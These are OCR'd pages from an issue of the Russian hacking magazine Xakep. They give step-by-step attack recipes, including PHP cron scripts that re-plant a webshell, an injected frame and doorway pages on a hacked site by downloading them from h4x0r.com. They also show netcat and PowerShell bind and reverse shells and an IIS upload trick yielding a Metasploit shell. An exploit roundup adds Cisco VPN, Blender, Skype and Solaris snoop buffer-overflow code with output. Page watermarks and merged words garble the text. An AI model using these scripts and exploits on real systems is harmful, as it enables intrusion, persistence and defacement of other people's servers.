Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

134_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

15.82 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 45 / 155 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.								.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha


			Сорецнебольшогоэксплоита, изменяющегоадресвозврата…
			2) order by.
			Вобоихслучаяхвместоorder by можноиспользоватьgroup by, прокоторый
			сотрудникихостингов, видимо, незнают. Такжеможнонаписатьбуквывразных
Организацияreverse-shell наWindows Vista/7
			регистрах, oRdEr bY, либоиспользоватьвышеперечисленныепробельные
			символы.
%09			3) PHP-injection.
%0a			Здесьабсолютноникакойзащитынет, развечтосвебхостингпугаетнас
%0b			страшнымиошибками, есливпеременнойуказать/etc/passwd, хотяникто
%0c			непомешаетпроверятьналичиеинклудовдругимифайлами, например/etc/
%0d			hosts.

¹ 6 ЗАДАЧА: НАСТРОИТЬКРОНДЛЯПОСТО-

ЯННОГОНАЛИЧИЯФАЙЛАНАСЕРВЕРЕ

РЕШЕНИЕ:

Допустим, тывзломалсайтиоченьхочешь, чтобытамосталсятвойшелл/фрейм/ дор. Рассмотримвсеситуацииподробно.

1) Шелл.

Создадимфайлик(назовемегоcronshell.php) ссодержимым:

<?php

$file = /home/user/www/shell.php; if(file_exists($file) == false) {

copy('http://www.h4x0r.com/shell.txt', $file);

}

Кодбудетпроверять, существуетлифайлнасервереи, еслиегонет, скопирует ствоегосайта. Кстати, убедись, чтодирективаallow_url_fopen установленав значениеOn, иначеиспользуйфункциюsystem() икомандуwget.

2) Фрейм.

Фрейммыбудемразмещатьвфайлеindex.php, хотятыможешьсделатьэтослюбымдругимфайлом. Дляначаласкопируйфайлindex.php сфреймомвнутрина удаленныйсервер; этобудетнашбэкап, наслучайеслиадминзаметитфрейм.

Далеенапишемскриптcronframe.php:

<?php

$frame = 'здесь код твоего фрейма'; $frame = preg_quote($file,'/');

$file = file_get_contents('/home/user/www/index.php'); preg_match($frame,$result,$file); // проверяем файл на нали- чие фрейма

if ($result == '') { // если фрейма нет

system('rm /home/user/www/index.php’); // удаляем файл copy('http://www.h4x0r.com/index.txt', '/home/user/www/

index.php'); // и копируем на его место файл с фреймом

}

3) Доры.

<?php

$testfile = '/home/user/www/dors/sitemap.html'; //файл для проверки наличия доров

if(file_exists($testfile) == false) { // проверяем на наличие файла и, если нет...

system('rm -rf /home/user/www/dors;mkdir /home/user/www/ dors');

copy('http://www.h4x0r.com/dors.tgz', '/home/user/www/dors/'); // копируем архив с дорами в папку

system('tar xzf /home/user/www/dors/dors.tgz'); // и разархивируем его

}

Атеперьотом, какзаставитькронобрабатыватьнашифайлы. Создадимвпапке

/home/user/ временныйфайлtest:

SHELL=/bin/bash

MAILTO=user

0-59 * * * * /home/user/cron.php

Разберемего: перваястрокауказывает, какуюшелл-оболочкунужноиспользо- вать, вторая, какомуюзеруотправлятьотчетоработекронаи, наконец, третья указывает, чтофайл/home/user/cron.php долженвыполнятьсякаждуюминуту. Теперьзанесемзаписьвтаблицу, дляэтоговыполнимкоманду:

crontab /home/user/test

Готово! Вкаталоге/var/spool/cron будетсозданфайл«user» примерностаким содержимым:

#DO NOT EDIT THIS FILE — edit the master and reinstall.

#(/home/user/test installed on Mon Mar 29 02:31:34 2004)

#(Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)

SHELL=/bin/bash

MAILTO=user

0-59 * * * * /home/user/cron.php

—ифайл/home/user/cron.php будетзапускатьсякаждуюминуту.

XÀÊÅÐ 03 /134/ 10

039

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ВЗЛОМ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

…ирезультатегоработы, каквидим, успешной

ПерехватфайловпоFTP-транспорту

¹ 7 ЗАДАЧА: СДЕЛАТЬВИЗУАЛИЗАЦИЮ

ТОПОЛОГИИИЗЗАХВАЧЕННОГОСЕТЕВОГОТРАФИКА

РЕШЕНИЕ:

ПодобныевещиумеетделатьNMAP, правда, послепередачиемуегожеотчета либоприпроведениисканирования. Движоктамещесыроват, приобилии хостовжутковиснетиделаетработуневозможной. Поэтомупредлагаютебе немногодругоерешение.

1. Зададимкакой-нибудьпараметрдлясборатрафикавфайл.pcap:

tcpdump -w test.pcap -i eth1 tcp port 6881 or udp $ 33210 or 33220 $

2. Сохраненныйтрафикскормимспециальнойпрограмме— rumint (rumint.org), котораявдващелчкавыдасттебетопологическуюкартувнесколькихвариантах просмотра.

¹ 8	ЗАДАЧА: СНИФАЯСЕТКУ, ПЕРЕХВА-	projects/ftpxerox.html). Кактолькоонапалит, чтогде-топередаетсяфайл, то
	ТИТЬФАЙЛЫВЯВНОМВИДЕПОFTP	сразуперехватываетегоисохраняетлокально.
		Все, чтотребуется— толькозапуститьпрограмму. Предварительнонадопере-
РЕШЕНИЕ:		направитьтрафнасебя, проведяоднуизатакпонесанкционированномусбору
РЕШЕНИЕ:		пользовательскоготрафика. Утилитаоткрываетнеразборчивыйрежимсетевой
Современныесниферыпозволяютнюхатьтрафик, нополучатьцелыефайлы—		карты, поэтомуопциональноэтавозможностьдолжнабытьподдерживаема
оченьпроблемно. Собиратьвбинарномвидедатуэтихфайловисохранять		твоимадаптером.
вручную— неудобно! Дляавтоматизациипроцессасуществуютболеепростые		Софтинкаимеетлишьодноограничение— нетподдержкипассивногорежима
программы, вродеFTPXerox v1.0 (members.fortunecity.com/sektorsecurity/		работыFTP. Востальном— работаетбезкаких-либоглюков.


¹ 9	ЗАДАЧА: НАУЧИТЬСЯРАБОТАТЬ
	ЗАДАЧА: НАУЧИТЬСЯРАБОТАТЬ	RemoteEndPoint)"
	СNETCAT ПОДVISTA	$stream = $client.GetStream()
		while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
		{
РЕШЕНИЕ:		$bytes[0..($i-1)]\|%{$_}
Здесьнетничегосложного, ноестьуловка, которуюнемногиезнают.		if ($Echo){$stream.Write($bytes,0,$i)}
Попробуйпривызовеинтерпретатораобратитьсякpowershell.exe,		}
вместопривычногоcmd.exe ипосмотришь, чтополучится:).		$client.Close()
		$listener.Stop()
Организация BindShell:		write-host "Connection closed."
		}
nc -l -e powershell.exe -t -p 666
nc -l -e powershell.exe -t -p 666		Примерзапускасценария:
telnet localhost 666		Примерзапускасценария:
Организация ReverseShell:
Организация ReverseShell:		PS> Trace-Port -ip 192.168.1.99 -port 333
nc -l -p 666		Waiting for a connection on port 333...
nc -e powershell.exe localhost 666
		Now script waiting for connection on port 333. I will connect to
ЕщеодинтрюксвязансширокимивозможностямиPowerShell.
ЕщеодинтрюксвязансширокимивозможностямиPowerShell.		this port using telnet.exe, and then write word "Test" into it:
Например, нанемможносоздатьклонnetcat, тольковскриптовой
интерпретации:		Connected from 192.168.1.99:61829
		84
function Trace-Port([int]$port=23,		101
[string]$IPAdress="127.0.0.1", [switch]$Echo=$false){		115
$listener = new-object System.Net.Sockets.		116
TcpListener([System.Net.IPAddress]::Parse($IPAdress), $port)		13
$listener.start()		10
[byte[]]$bytes = 0..255\|%{0}		Connection closed.
write-host "Waiting for a connection on port $port..."
write-host "Waiting for a connection on port $port..."		Соответственно, меняя«test»-параметр, тыможешьдобитьсяуспеш-
$client = $listener.AcceptTcpClient()
write-host "Connected from $($client.Client.		нойпередачикоманднаисполнение. z

040	XÀÊÅÐ 03 /134/ 10

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ВЗЛОМ

АНДРЕЙ КОМАРОВ KOMAROV@ITDEFENCE.RU ИТЦ «АНАЛИТИКА» / ITDEFENCE.RU

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ОБЗОР ЭКСПЛОИТОВ

РУБРИКУ МОЖНО ПЕРЕИМЕНОВЫВАТЬ В «КАК СТРАШНО ЖИТЬ», УЧИТЫВАЯ, ЧТО С КАЖДЫМ НОМЕРОМ, ДНЕМ И ДАЖЕ ЧАСОМ ЧИСЛО ОБНАРУЖЕННЫХ БРЕШЕЙ В РАЗЛИЧНЫХ СИСТЕМАХ И ПО НЕ УМЕНЬШАЕТСЯ, А НЕИЗМЕННО РАСТЕТ. МЕЖДУ ПРОЧИМ, К ЧИТАТЕЛЯМ, ДЕЛОВОЕ ПРЕДЛОЖЕНИЕ НА ПЕРСПЕКТИВУ — ЕСЛИ ЗАНИМАЕШЬСЯ АНАЛИЗОМ КОДА, ИЗУЧЕНИЕМ АСПЕКТОВ БЕЗОПАСНОСТИ ПО И МОЖЕШЬ ЧЕМ-ТО ПОДЕЛИТЬСЯ, ТО ПРИСЫЛАЙ СВОИ ЗАМЕЧАНИЯ ИЛИ ПРЕДЛОЖЕНИЯ НА МОЮ ПОЧТУ. НАИБОЛЕЕ ИНТЕРЕСНЫЕ ИЗ НИХ ПОПАДУТ НА СТРАНИЦЫ РУБРИКИ И ПОРАДУЮТ ГЛАЗ. ИНТЕРЕСНЕЕ ВСЕГО, ЕСЛИ ЭТО БУДУТ ЕЩЕ НЕОПУБЛИКОВАННЫЕ НИГДЕ ЭКСПЛОИТЫ ИЛИ БРЕШИ БЕЗОПАСНОСТИ.

РАЗЪЯСНЕНИЕПРИМЕНЕНИЯCLIENTLESS VPN SSL

01ОБХОДОГРАНИЧЕНИЙВCISCO VPN SSL

BRIEF CISCO VPN SSL — модулькCISCO ASA ицелойлинейкепродуктовCISCO, которыйпредназначендлярасширениясетевогофункционаладевайса. ОнпозволяеторганизоватьраспределеннуюVPN-сеть, увеличивсетевыересурсыинфраструктурызасчетразнесенныхчерез интернетклиентов.

EXPLOIT CISCO VPN Clientless — ограничивающийклиентаопционал, которыйразрешаетилизапрещаетпользователюVPN обращатьсяк ресурсамвиртуальнойчастнойсети. Реализациямеханизмаограниченийвоистинувыполненаоченькриво. CISCO шифруетресурсвужасную строку, затемподставляеткнейспециальноеслово, конструируетлинк итолькотогдадоверенныйпользователь, открываяее, получаетдоступ кресурсу.

Каквыяснилось, любойжелающийможетспокойнообратитьсяклюбому интернет/Intranet-узлу, обходяограничениясистемы. Предположим, желанныйресурс— http://intranet. Чтобыобратитьсякнему, следует произвестиследующиедействия:

1)ПреобразуемстрокукROT13 — uggc://vagenarg.

2)СимволыASCII-последовательностиконвертимвHEX — 756767633a2f2f766167656e617267.

3)Открываемвбраузерелинк— https://[CISCOVPNSSL]/+CSCO+0075676 7633a2f2f766167656e617267++.

Все! Дляупрощенияпроцессазлодеинаписалискрипт:

#!/bin/bash

echo -n "write URL:" read a

b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m] [N-Z][A-M]' | od

-tx1 | cut -c8- | sed 's/ //g'` | paste -s -d ''; echo -n "URL "

НАСТРОЙКИОГРАНИЧЕНИЙCLIENTLESS ВCISCO VPN-МОДУЛЕ

echo -n "https://[CISCOVPNSSL]/+CSCO+00";; echo -n $b; echo -n "++";

echo "";

SOLUTION АктивируйдополнительныетипыACL-листов(webtype/ filter), атакжеознакомьсясдокументом«Cisco Understanding Features NotSupported in Clientless SSL VPN».

TARGETS Cisco ASA <= 8.x.

02ОБХОДОГРАНИЧЕНИЙБЕЗОПАСНОСТИ ВMICROSOFT IIS

BRIEF УязвимостьнайденавизвестнейшемWEB-сервереотMicrosoft. ПутемзагрузкиспециальносформированныхASP-файловнаузел существуетвозможностьвыполнитьпроизвольныйкод, пробекдорить системуидалее— делатьпрактически, чтоугодно. Вызваноэтонедостаточнымиограничениямиприпроверкерасширенийфайлов.

EXPLOIT IIS нормальновоспринимаетименафайловсрасширениями:

.asp;.gif, .asp;.jpg, .asp;.exe. Припроверкесерверобращаетвнимание тольконапервоерасширение, ачтостоитза«;» — емубезразницы. Методикасостоитвтом, что, используятакоеобстоятельство, мыпредварительноготовимзлонамеренныйфайл, загружаемегонасервер (идеально, еслиэтобудеткартинка), затемобращаемсячерезWEB для

042	XÀÊÅÐ 03 /134/ 10

hang

NOW!

w Click

BUY

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

КОДSHELLCODE'A ПРЕОБРАЗОВАНВПОСЛЕДОВАТЕЛЬНОСТЬСИМВОЛОВ, ПРЕДСТАВЛЕННЫХВВИДЕОПЕРАТОРАВЗЯТИЯ СИМВОЛАПОЕГОНОМЕРУВТАБЛИЦЕASCII

запускашелл-коданаисполнение. РазработчикамиизвестногодистрибутиваBacktrack былосозданосредство, работающееименно потакойсхеме(backtrack.it/~emgent/exploits/ IIS-asp.py):

СПОМОЩЬЮXDOTOOL МОЖНОДЕЛАТЬСМЫШЬЮИКЛАВИАТУРОЙПРАКТИЧЕСКИВСЕ, ЧТО УГОДНО. НАПРИМЕР, ПОТАЙМЕРУИСПОЛНИТЬСНЯТИЕСКРИНШОТАСОПРЕДЕЛЕННОЙЗОНЫ ЭКРАНА

./IIS-asp.py <image.jpg> <номер shellcode>

Опционально, подномеромшелл-кодаподразумевается0 — shell_bind_ tcp, 1 — meterpreter_bind_tcp, 2 — vncinject_bind_tcp, собственно, одни изсамыхизвестныхpayloads изпакетаMetasploit.

root@andrej:/tmp# ./IIS-asp.py image.jpg 0

Навыходеполучаемimage.asp;.jpg, которуютребуетсяпрогрузитьна WEB-сервер. Конечно, такаявозможностьбываетдалеконевсегда. Тем неменее, еслионаесть, черезформуобзоравыбираемнашфайл, льем насервер(например, впапку«images», «avatars», «uploads»). После чегообращаемсякней:

http://127.0.0.1/images/image.asp;.jpg

root@andrej:/tmp# nc -vv 10.12.6.6 31337

#Zerbion [10.12.6.6] 31337 (?) open

#Microsoft Windows [Version 5.2.3790]

#c:\windows\system32\inetsrv>whoami

> nt authority\network service

Порядок!

SOLUTION Тщательнеефильтроватьпрогружаемоенасерверсодержимоенаприкладномуровне.

TARGETS Microsoft Internet Information Services (IIS) 5.x/6.x.

03ИНЖЕКТКОДАВФАЙЛЫПРОЕКТОВ

BLENDER

BRIEF Blender (blender.org) — этоизвестныйпродуктдля3D-разра- ботчиковианиматоров, которыйпозволяетиспользоватьсредства моделирования, рендеринга, постобработкивидеоимногоедругое! На самомделеполноценнопользоватьсяимумеюттолькопрофессионалы, потомучтооннепроствиспользовании. Попалонврубрикупотойпростойпричине, чтосуществуетвозможностьиспользоватьеговыходные файлы(формат.blend) вкачествевредоносных.

EXPLOIT ОткройтекстовыйредакторкодаBlender (Text Editor), правый клик, «New». Впоявившемсяполе, пишемсвойкоднаPython, например:

import os os.system("calc.exe")

Вполе«Text Name» (TX:Text.001) заменяемзначениенасвоесуказаниемнашегоскриптаTX:myscript. Затемпереходимнапанель«Buttons Window», извыпадающейпанели(panel) выбираем«Script», приэтом проверив, чтографа«enable script links» активна. Жмемна«New», выбираемнамисозданноескриптовоеописание(myscript). Извыпадающегоменюсобытийвыбери«OnLoad». Теперьсохраняемфайлв выходной, этоделаетсяиз«User Preferences ÆFile ÆSave».

TARGETS Blender 2.49b, Blender 2.40, Blender 2.35a, Blender 2.34.

SOLUTION Производительбылуведомленоподобномспособевнедрениязлонамеренногокодавсвоипродукты, ноникакойответнойреакции непоследовало. Изпрактическихсоветовможнодатьспособизучения

.blend-файла— парситьпроектнапредметSDNA Scriptlink (http://www.

XÀÊÅÐ 03 /134/ 10

043

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ВЗЛОМ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

КТОБЫЗНАЛ, ЧТОВСТОЛЬБЕЗОБИДНЫЙПРОЕКТМОЖНО ВНЕДРИТЬЧТО-ТОВРЕДОНОС- НОЕ!

atmind.nl/blender/blender-sdna.html#struct:ScriptLink), кудапомещается самкод.

04УЯЗВИМОСТИВLINUX-ВЕРСИИSKYPE

BRIEF Сразупосленовогогодадвоеитальянскихисследователей обнаружилистранныйкосяквSkype (идаженесколько). Скорее, этиуязвимостиябыпричислилнекклассамконкретныхбрешейбезопасности, акошибкампроектирования(design error). КасаютсяонитолькоLinuxверсии, GUI-интерфейскоторойнаписансиспользованиемсредств библиотекиQT (qt.nokia.com/products).

EXPLOIT

1. Реализацияpseudo-XSS. Многиеполяпрограммывоспринимаюттеги HTML из-затого, чтоонинеурезаютсяпрограммно. Возможно, разработчикамиподразумевалось, чтопользовательможетсделатьсвой никжирнымилидобавитьконтактвдругомцветеспомощьюсредств разметки, но, помоемумнению— простонеуследили. Попробуйиспользоватьтэг«"><h1><"» впоискеконтактов, обзоредлявыборафайловдля отправки, поляхпрофиля. Увидел? Конечно, эксплуатироватьтакое— достаточнотрудно, но, еслипроявитьсмекалку, можнодобитьсяинтересного. Например, поле«Домашняястраница» впрофиледоступнодля кликастороннимпользователям. Этозначит, еслимысумеемзасунуть тудареализациюXSS, товполневероятно, что, когдаинтересующийся нашейдомашнейстраницейюзеркликнетпоней, просматриваянаш профиль, егождетбеда, хотябынауровне«phishing»-атаки:

хakep.ru">Ошибка! Недопустимый объект гиперссылки.>

Притакомраскладевпрофилевкачествестраницыбудетвиднеться google.it, авотпослекликапользовательугодитнанашсайтжурнала! Естественно, вреалияхместо«Хакер.ру» займетресурссвредоносным кодом, накоторомвтомчислеможетрасполагатьсясценарийпроведе- нияXSS-атаки.

2. Denial Of Service — загрузкаЦПна100%. Дляизученияатакитребу-

етсяустановкаxdotool (semicomplete.com/projects/xdotool) — средства имитациивиртуальныхмышииклавиатуры. Частоегоиспользуютдля

автоматизацииручныхзадачвLinux/FreeBSD, например, повторяющихсядействийврамкахбраузера, какой-топрограммыитакдалее. Впрочем, дляWindows такихсредствнавалом(Automize).

СначалакурсормышитребуетсярукамиустановитьвполевводасообщенияSkype, затемсредствамиxdotool мысформируембольшуюстроку, состоящуюиззнаковпробела, иотправимее:

sleep 5 && xdotool type "`perl -e "print 'S 'x44801"`" && xdotool key Return

sleep 5 && xdotool type 's/../' && xdotool type "`perl -e "print 'S 'x44801"`" && xdotool type '/' && xdotool key Return

Соответственно, 0x44801 — пробельныйзаменительвхексе. Вследствиеэтогопроизойдетотказвобслуживаниипрограммыиз-за недостаточнойпроверкивходныхданных. Принекоторыхобстоятельствахбылзамечен«вылет» собеседникаизпрограммы. Болеебезобидныепримерыпереполненийбылиобнаруженыприорганизации звонковилипосылкеSMS наномера, превышающие89601-символ.

TARGETS

Версии<=2.1 Beta.

SOLUTION

Внастоящеевремяисправленийуязвимостинеимеется.

05МНОЖЕСТВЕННЫЕПЕРЕПОЛНЕНИЯ БУФЕРАВSUN SOLARIS (SNOOP)

BRIEF Вавгустепрошлогогодабылиобнаруженыкритическиеуяз-

вимостивутилитеsnoop (docs.sun.com/app/docs/doc/819-2240/snoop- 1m?a=view) ОСSUN Solaris. Snoop представляетсобойсредствосетевого мониторингаианализа, некийаналогtcpdump/ethereal. Нетрудно догадаться, чтоуязвимости, эксплуатируемыевсниферах, какправило,

044	XÀÊÅÐ 03 /134/ 10

hang

NOW!

BUY

w Click

-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ПРОБИРАЕМСЯНАWEB-СЕРВЕР

РАБОТАSOLARIS SNOOP — СНИФЕРКАКСНИФЕР!

связаныснеправильнойобработкойанализируемыхпакетовстека разныхпротоколов. НапримереWireshark:

CVE-2006-3627 — отказ в обслуживании и выполнение произвольного кода при анализе пакетов GSM BSSMAP CVE-2009-3243 — отказ в обслуживании и выполнение произвольного кода при анализе пакетов TLS

CVE-2009-3550 — отказ в обслуживании и выполнение произвольного кода при анализе DCERPC-пакетов

CVE-2009-3829 — целочисленное переполнение в wiretap/ erf.c при анализе беспроводного стека протоколов

Поверь, списокможнопродолжатьещедолго. Из-заобилияиразнооб- разияпротоколовиихструктурразработчикииногдаздоровохалтурят, забывая, чтомогутдопуститьогромныебрешивбезопасностипритаком подходе. НаэтотразуязвимостьсвязанасобработкойSMB-пакетов

(src/cmd/cmd-inet/usr.sbin/snoop/snoop_smb.c). Взглянемнауязвимый фрагменткода:

06 static void

07 interpret_negprot(int flags, uchar_t *data, int len, char *xtra)

08 {

09int length;

10int bytecount;

11char dialect[256];

12...

13protodata = (uchar_t *)data +

sizeof (struct smb);

14	protodata++;	/* skip wordcount */
15

16if (smbdata->flags & SERVER_RESPONSE) {

17...

18} else {

19/*

20* request packet:

21* short bytecount;

22* struct { char fmt; char name[]; } dialects

23*/

24bytecount = get2(protodata);

25protodata += 2;

26if (flags & F_SUM) {

27while (bytecount > 1) {

28length = sprintf(dialect,

(char *)protodata+1);

29protodata += (length+2);

30bytecount -= (length+2);

31}

Обратив внимание на строку 16, можно понять, что, если SMBпакет не является ответом сервера, то ветвление перейдет на «else» условие и механизм по парсингу пакета (get2()). Продолжается считывание и заполнение структуры данных пакета (27), до метки F_SUM. После чего выполняется копирование части элементов управляемого пользователем пакета в буфер (dialect) с помощью функции sprintf. При этом сам буфер ограничен всего 256 байтами, а никаких проверок на него не производится.

XÀÊÅÐ 03 /134/ 10

045

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ВЗЛОМ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ПОДУМАТЬТОЛЬКО, СТОЛЬКОУЯЗВИМОСТЕЙВСНИФЕРЕ!

EXPLOIT Рабочийкодэксплоитаможноскачатьздесь— milw0rm.org/ exploits/6328.

Действияатакующего:

attack:/exploits# ./hoagie_snoop -t 192.168.0.1

* [*] attacking 'SunOS opensolaris 5.11 snv_86 i86pc i386

i86pc' on '192.168.0.1' ...

*[*] execute 'uname -a > /tmp/.patch.your.system.txt' now ...

*[*] done

attack:/exploits#

То, чтоприэтомвидитадминистраторсистемы:

admin@opensolaris:~# snoop port 445

*Using device pcn0 (promiscuous mode)

*sh[1]: i??SMBr: not found [No such file or directory]

*WARNING: received signal 11 from packet 1 admin@opensolaris:~# cat /tmp/.patch.your.system.txt

*SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc Solaris admin@opensolaris:~#

Устройствосамогоэксплоитакрайнепросто! Рассмотримегоглавную часть, отвечающуюзаэксплуатациюпереполнениябуфера. Сначаласоздается«сырой» сокетдляформированияиинжектасвоегопакетавсеть:

01 s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); 02 if (s == -1) {

03 printf("[*] failed to create raw socket\n");

04 } else {

05 sin.sin_family = AF_INET;

06 sin.sin_port = htons(port);

07 sin.sin_addr.s_addr = inet_addr(target); 08

09if (!command) {

10command = "uname -a > /tmp/.patch.your.system.txt";

11}

13 printf("[*] attacking '%s' on '%s' ...\n", targets[idx].description, target);

Далеепроисходитвставкасвоейисполняемойнаудаленноймашине командывбуфер, кстати, спомощьюбезопаснойфункцииsnprintf:

046	XÀÊÅÐ 03 /134/ 10

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

КОДЫКОМАНДSMB — ИМЕННО0X72 ИСПОЛЬЗУЕТСЯПРИЭКСПЛУАТАЦИИОПИСАННОЙУЯЗВИМОСТИ

1 snprintf(buffer, sizeof(buffer), ";%s;", command);

3/* char dialect[256] */

4for (i = strlen(buffer); i < 256; i++) { buffer[i] = SMB_HEADER_FILLER; }

Циклзаполняетбуферdialect донужнойконсистенциипоструктуре. Затемпроисходитперезаписьнужныхадресовзабуферомдлядостижения EIP иегопоследующаяперезаписьнанужныйнамадресвозврата:

1/* Перезапись bytecount*/

2buffer[i++] = SMB_HEADER_FILLER;

3buffer[i++] = SMB_HEADER_FILLER;

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

4buffer[i++] = SMB_HEADER_FILLER;

5buffer[i++] = SMB_HEADER_FILLER;

1/* Перезапись length */

2buffer[i++] = SMB_HEADER_FILLER;

3buffer[i++] = SMB_HEADER_FILLER;

4buffer[i++] = SMB_HEADER_FILLER;

5buffer[i++] = SMB_HEADER_FILLER;

/* 4 байта еще */ (к слову, их устанавливает GCC для выравнивания стека)

2buffer[i++] = SMB_HEADER_FILLER;

3buffer[i++] = SMB_HEADER_FILLER;

4buffer[i++] = SMB_HEADER_FILLER;

5buffer[i++] = SMB_HEADER_FILLER;

1/* Указатель на ebp */

2buffer[i++] = SMB_HEADER_FILLER;

3buffer[i++] = SMB_HEADER_FILLER;

4buffer[i++] = SMB_HEADER_FILLER;

5buffer[i++] = SMB_HEADER_FILLER;

1/* адрес возврата (system())*/

2buffer[i++] = targets[idx].address & 0xff;

3buffer[i++] = (targets[idx].address >> 8) & 0xff;

4buffer[i++] = (targets[idx].address >> 16) & 0xff;

5buffer[i++] = (targets[idx].address >> 24) & 0xff;

Финал, отправкакрасоты:

01 printf("[*] execute '%s' now ...\n", command);

03 send_smb_packet(s, &sin, SMB_COMMAND_TRIGGER, buffer);

05 printf("[*] done\n");

07 close(s);

08 }

10return 0;

11}

TARGETS

Sun Solaris 8/9/10.

OpenSolaris < snv_96.

SOLUTION

Патчитсяэтоделозаменойнебезопаснойфункциинабезопасную— snprintf:

1while (bytecount > 1)

{

2- length = sprintf(dialect, (char *)protodata+1);

3+ length = snprintf(dialect, sizeof (dialect),

4 +	"%s", (char *)protodata+1);

5protodata += (length+2);

6+ if (protodata >= data+len)

7 +

break;

8bytecount -= (length+2);

XÀÊÅÐ 03 /134/ 10

047

hang

NOW!

BUY

w Click

-xcha

ВЗЛОМ

Степан «Step» Ильин step@glc.ru

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

В КОРПОРАТИВНОМ БЛОГЕ GOOGLE — ЗАЯВЛЕНИЕ ОБ АТАКЕ НА РЕСУРСЫ КОМПАНИИ СО СТОРОНЫ КИТАЯ. ВО ВСЕХ НОВОСТНЫХ ЛЕНТАХ — БУБНЕЖ О ПОПЫТКЕ ВЫКРАСТЬ КОНФИДЕНЦИАЛЬНЫЕ ДАННЫЕ У СОТРУДНИКОВ GOOGLE, MCAFEE, ADOBE И ЕЩЕ ДВУХ ДЕСЯТКОВ ИЗВЕСТНЫХ КОМПАНИЙ.

ÀНАМ ЭТО ПО БАРАБАНУ :). КАКАЯ РАЗНИЦА, ЧТО ХОТЕЛИ УКРАСТЬ ХАКЕРЫ

— ГОРАЗДО ИНТЕРЕСНЕЕ РАЗОБРАТЬСЯ, КАК ОНИ ХОТЕЛИ ЭТО СДЕЛАТЬ.

ÀПОСКОЛЬКУ В ОСНОВЕ ЛЕЖИТ НОВАЯ УЯЗВИМОСТЬ В INTERNET EXPLORER, ТО И ЗАЙМЕМСЯ МЫ ТЕМ, ЧТО ПРЕПАРИРУЕМ РАБОЧИЙ СПЛОИТ.

048	XÀÊÅÐ 03 /134/ 10

<<< < Предыдущая 1 2 3 45 / 155 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202415.04 Mб12129_Optimized.pdf
#
20.04.202417.96 Mб12130_Optimized.pdf
#
20.04.202417.2 Mб12131_Optimized.pdf
#
20.04.202410.05 Mб12132_Optimized.pdf
#
20.04.202415.19 Mб12133_Optimized.pdf
#
20.04.202415.82 Mб12134_Optimized.pdf
#
20.04.202415.43 Mб12135_Optimized.pdf
#
